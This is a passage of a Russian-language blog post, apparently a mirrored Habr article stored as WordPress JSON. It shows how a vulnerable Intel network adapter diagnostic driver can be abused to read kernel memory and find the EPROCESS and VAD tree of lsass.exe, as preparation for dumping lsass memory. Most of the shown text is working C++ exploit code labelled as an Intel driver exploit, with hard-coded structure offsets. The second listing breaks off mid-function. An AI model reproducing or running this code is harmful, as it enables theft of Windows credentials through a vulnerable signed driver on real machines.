\u043f\u043e\u0438\u0441\u043a\u0443 \u0434\u0432\u0443\u0445 EPROCESS \u0434\u043b\u044f lsass.exe \u0438 shor.exe. \u0421\u043f\u0435\u0440\u0432\u0430 \u044f \u043d\u0430\u0448\u0435\u043b EPROCESS \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 System.exe. \u0412 \u044d\u0442\u043e\u043c \u043c\u043d\u0435 \u043f\u043e\u043c\u043e\u0433\u043b\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-hardware\/drivers\/kernel\/mm64bitphysicaladdress\">PsInitialSystemProcess<\/a>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 EPROCESS \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 System.exe. \u0417\u0430\u0442\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f ActiveProcessLinks \u0438\u0437 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b EPROCESS \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 System.exe, \u044f \u043f\u0440\u043e\u0448\u0435\u043b \u043f\u043e \u0434\u0432\u0443\u0445\u0441\u0432\u044f\u0437\u043d\u043e\u043c\u0443 \u0441\u043f\u0438\u0441\u043a\u0443 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0438 \u043d\u0430\u0448\u0435\u043b EPROCESS \u0434\u043b\u044f lsass.exe \u0438 shor.exe, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0442\u043e\u043c \u0431\u0443\u0434\u0443\u0442 \u043f\u0435\u0440\u0435\u0434\u0430\u043d\u044b \u0432 MmCopyVirtualMemory, \u0441 \u0446\u0435\u043b\u044c\u044e \u0434\u0430\u043c\u043f\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 \u0438\u0437 user-mode. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f EPROCESS \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u044f \u043d\u0430\u0448\u0435\u043b VadRoot \u0438 VadCount, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u0443\u0434\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0431\u0443\u0434\u0443\u0449\u0435\u043c.<\/p>\n<p>\u041a\u043e\u0434 \u043f\u043e\u0438\u0441\u043a\u0430 EPROCESS, VadRoot \u0438 VadCount:<\/p>\n<pre><code class=\"cpp\">int main(int argc, char** argv) {  HANDLE   hDevice;  printf(\"--[ Intel Network Adapter Diagnostic Driver exploit ]--\\n\");  printf(\"Opening handle to driver..\\n\"); if ((hDevice = CreateFileA(intel::szDevice, GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, NULL)) != INVALID_HANDLE_VALUE) { printf(\"Device %s succesfully opened!\\n\", intel::szDevice); printf(\"\\tHandle: %p\\n\", hDevice); } else { printf(\"Error: Error opening device %s\\n\", intel::szDevice); return 0; }  ULONG64 ReadSystemEPROCESS = PsInitialSystemProcess(); ULONG64 SystemEPROCESS = 0; intel::MemCopy(hDevice, (uint64_t)&amp;SystemEPROCESS, (uint64_t)ReadSystemEPROCESS, 8);   printf(\"[+]PsInitialSystemProcess pointer: 0x%llx\\n\", ReadSystemEPROCESS); printf(\"[+]PsInitialSystemProcess: 0x%llx\\n\", SystemEPROCESS);  ULONG64 ActiveProcessLinksOffset = 0x2f0; ULONG64 ImageFileNameOffset = 0x450; ULONG64 ActiveProcessLinks = SystemEPROCESS+ ActiveProcessLinksOffset; ULONG64 VadRootOffset = 0x658; ULONG64 VadCountOffset = 0x668;  ULONG64 VadRoot_lsass = 0; ULONG64 VadCount_lsass = 0; ULONG64 EPROCESS_lsass = 0; ULONG64 EPROCESS_CurrentProcess = 0; while (true){ ULONG64 ActiveProcessLinksNext = 0; intel::MemCopy(hDevice, (uint64_t)&amp;ActiveProcessLinksNext, (uint64_t)ActiveProcessLinks, 8);  UCHAR ImageFileName[MAX_PATH] = \"\"; intel::MemCopy(hDevice, (uint64_t)&amp;ImageFileName, (uint64_t)(ActiveProcessLinksNext - ActiveProcessLinksOffset + ImageFileNameOffset), MAX_PATH);  if (!strcmp((const char*)ImageFileName, \"lsass.exe\")) { printf(\"[+]Name process: %.*s\\n\", (int)sizeof(ImageFileName), ImageFileName); EPROCESS_lsass = ActiveProcessLinksNext - ActiveProcessLinksOffset; printf(\"[+]EPROCESS lsass: 0x%llx\\n\", EPROCESS_lsass);  intel::MemCopy(hDevice, (uint64_t)&amp;VadRoot_lsass, (uint64_t)(ActiveProcessLinksNext - ActiveProcessLinksOffset + VadRootOffset), 8); intel::MemCopy(hDevice, (uint64_t)&amp;VadCount_lsass, (uint64_t)(ActiveProcessLinksNext - ActiveProcessLinksOffset + VadCountOffset), 8); printf(\"[+]VadRoot: 0x%llx\\n\", VadRoot_lsass); printf(\"[+]VadCount: 0x%llx\\n\", VadCount_lsass);  }  if (!strcmp((const char*)ImageFileName, \"shor.exe\")) { printf(\"[+]Name process: %.*s\\n\", (int)sizeof(ImageFileName), ImageFileName); EPROCESS_CurrentProcess = ActiveProcessLinksNext - ActiveProcessLinksOffset; printf(\"[+]EPROCESS CurrentProcess: 0x%llx\\n\", EPROCESS_CurrentProcess); }  if ((EPROCESS_lsass !=0) &amp;&amp; (EPROCESS_CurrentProcess != 0)) { walkAVL(hDevice, VadRoot_lsass, VadCount_lsass, EPROCESS_lsass, EPROCESS_CurrentProcess); break; } ActiveProcessLinks = ActiveProcessLinksNext; }  getchar(); return 0; } <\/code><\/pre>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:   <\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<h2>3. \u041f\u043e\u0438\u0441\u043a VAD.<\/h2>\n<p>\u041d\u0430\u0439\u0434\u044f EPROCESS \u0434\u043b\u044f lsass.exe \u043c\u043d\u0435 \u043d\u0443\u0436\u043d\u043e \u043e\u0431\u043e\u0439\u0442\u0438 AVL \u0434\u0435\u0440\u0435\u0432\u043e \u0438 \u0438\u0437\u0432\u043b\u0435\u0447\u044c \u0432\u0441\u0435 VAD \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0430\u0434\u0440\u0435\u0441\u0430 \u043d\u0430 \u043d\u0430\u0447\u0430\u043b\u043e \u0438 \u043a\u043e\u043d\u0435\u0446 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u0432 user-mode, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0443\u0442\u044c \u043a \u0444\u0430\u0439\u043b\u0443. \u0414\u0430\u043d\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u0441\u044f \u043c\u043d\u0435 \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0438\u0437 user-mode \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u0438 MmCopyVirtualMemory. <\/p>\n<p>\u041f\u0440\u0438\u043c\u0435\u0440 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f VAD \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u0438\u0445 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e:<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>\u041f\u043e\u0438\u0441\u043a VAD \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0435\u0439 \u0434\u043b\u044f \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441 \u043d\u0430\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u0432\u0435\u0440\u0448\u0438\u043d\u044b AVL \u0434\u0435\u0440\u0435\u0432\u0430, \u0437\u0430 \u044d\u0442\u043e \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c VadRoot:<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u0432 VadRoot, \u043c\u043d\u0435 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u043e\u0439\u0442\u0438 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 AVL \u0434\u0435\u0440\u0435\u0432\u0443 \u0438 \u0438\u0437\u0432\u043b\u0435\u0447\u044c \u0438\u0437 \u043d\u0435\u0433\u043e \u0432\u0441\u0435 VAD \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438. \u041e\u043d\u0438 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432 Left (\u0441\u043c\u0435\u0449\u0435\u043d\u0438\u0435 0x00-0x07) \u0438 Right (\u0441\u043c\u0435\u0449\u0435\u043d\u0438\u0435 0x08-0x10):<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e \u043a\u0430\u043a VAD \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u0431\u044b\u043b\u0438 \u043d\u0430\u0439\u0434\u0435\u043d\u044b, \u044f \u043f\u0440\u043e\u0448\u0435\u043b \u043f\u043e \u043d\u0438\u043c \u0438 \u0438\u0437\u0432\u043b\u0435\u043a \u0430\u0434\u0440\u0435\u0441\u0430 \u043d\u0430 \u043d\u0430\u0447\u0430\u043b\u043e (\u0441\u043e\u0435\u0434\u0438\u043d\u044f\u044f 4 \u0431\u0430\u0439\u0442\u0430 \u0438\u0437 0x18 \u0438 1 \u0431\u0430\u0439\u0442 \u0438\u0437 0x20) \u0438 \u043a\u043e\u043d\u0435\u0446 (\u043e\u0431\u044a\u0435\u0434\u0438\u043d\u044f\u044f 4 \u0431\u0430\u0439\u0442\u0430 \u0438\u0437 0x1c \u0438 1 \u0431\u0430\u0439\u0442 \u0438\u0437 0x21) \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u0432 user-mode:<\/p>\n<figure class=\"\"><figcaption><\/figcaption><\/figure>\n<p>\u041a\u043e\u0434 \u043e\u0431\u0445\u043e\u0434\u0430 AVL \u0434\u0435\u0440\u0435\u0432\u0430: <\/p>\n<pre><code class=\"cpp\">void walkAVL(HANDLE hDevice, ULONG64 VadRoot, ULONG64 VadCount, ULONG64 EPROCESS_lssas, ULONG64 EPROCESS_GetProcess) { ULONG64* queue; ULONG64 count = 0; ULONG64 cursor = 0; ULONG64 last = 1; VAD* vadList = NULL; queue = (ULONGLONG*)malloc(sizeof(ULONGLONG) * VadCount * 4); \/\/ Make room for our queue queue[0] = VadRoot; \/\/ Node 0 vadList = (VAD*)malloc(VadCount * sizeof(*vadList));  ULONG64 size = 0; ULONG64 mask = 0; intel::MemCopy(hDevice, (uint64_t)&amp;mask, (uint64_t)VadRoot, 8); mask = mask &amp; 0xffff000000000000; while (count &lt; VadCount) { ULONG64 currentNode; currentNode = queue[cursor];  if (currentNode == 0) { cursor++; continue; }  ULONG64 VadRootLeft = 0; intel::MemCopy(hDevice, (uint64_t)&amp;VadRootLeft, (uint64_t)currentNode, 8); ULONG64 VadRootRight = 0; intel::MemCopy(hDevice, (uint64_t)&amp;VadRootRight, (uint64_t)(currentNode + 0x8), 8); \/\/printf(\"[+]VadRootLeft: 0x%llx\\n\", VadRootLeft); \/\/printf(\"[+]VadRootRight: 0x%llx\\n\", VadRootRight); queue[last++] = VadRootLeft; queue[last++] = VadRootRight; ULONG64 Start = 0; ULONG64 StartingVpn = 0; ULONG64 StartingVpnHigh = 0; intel::MemCopy(hDevice, (uint64_t)&amp;StartingVpn, (uint64_t)(currentNode + 0x18), 4); intel::MemCopy(hDevice, (uint64_t)&amp;StartingVpnHigh, (uint64_t)(currentNode + 0x20), 1); Start = (StartingVpn &lt;&lt; 12) | (StartingVpnHigh &lt;&lt; 44);  ULONG64 End = 0; ULONG64 EndingVpn = 0; ULONG64<\/code><\/pre>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-329215","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/329215","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=329215"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/329215\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=329215"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=329215"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=329215"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}